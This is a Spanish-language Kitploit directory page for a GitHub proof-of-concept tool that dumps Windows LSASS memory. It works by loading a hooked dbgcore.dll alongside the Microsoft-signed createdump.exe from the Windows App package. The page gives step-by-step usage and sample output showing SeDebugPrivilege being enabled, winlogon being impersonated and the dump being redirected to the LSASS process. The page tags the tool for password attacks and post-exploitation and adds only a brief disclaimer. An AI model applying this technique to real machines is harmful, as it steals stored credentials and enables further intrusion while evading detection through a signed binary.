Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
createdump — Aprovechar la herramienta createdump de WindowsApp para obtener un volcado de lsass | Kitploit
Herramientas/GitHubGitHub/rweijnen/createdump
Ataques de ContraseñasHerramientas de SuplantaciónPost-ExplotaciónRed Teaming
GitHubrweijnen/createdump

createdump

Aprovechar la herramienta createdump de WindowsApp para obtener un volcado de lsass

Ver Repositorio
1512021hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Windows App Volcado de LSASS de Windows App - Prueba de concepto

Este proyecto demuestra cómo volcar el proceso LSASS utilizando la herramienta createdump.exe, un ejecutable firmado por Microsoft, desde la Windows App, aprovechando un hook personalizado para habilitar el acceso del proceso a LSASS.

Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')

    Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc

SignerCertificate                         Status                                       StatusMessage                               Path
-----------------                         ------                                       -------------                               ----
C2048FB509F1C37A8C3E9EC6648118458AA01780  Valid                                        Signature verified.                         createdump.exe

Cómo usar

  1. Copia createdump de la carpeta WindowsApp a una carpeta de tu elección (copy C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe .)
  2. coloca dbgcore.dll de este repositorio en la misma carpeta
  3. ejecuta createdump (opcionalmente proporciona parámetros)

nota: requiere derechos de administrador.

La salida debería ser algo así:

c:\work\_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump

Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
  ProcessId: 35828
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
  ProcessId: 1512
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.

Aviso legal

Este proyecto está destinado únicamente a fines educativos. El mal uso de esta herramienta podría violar las políticas de privacidad y seguridad.

Descargar herramienta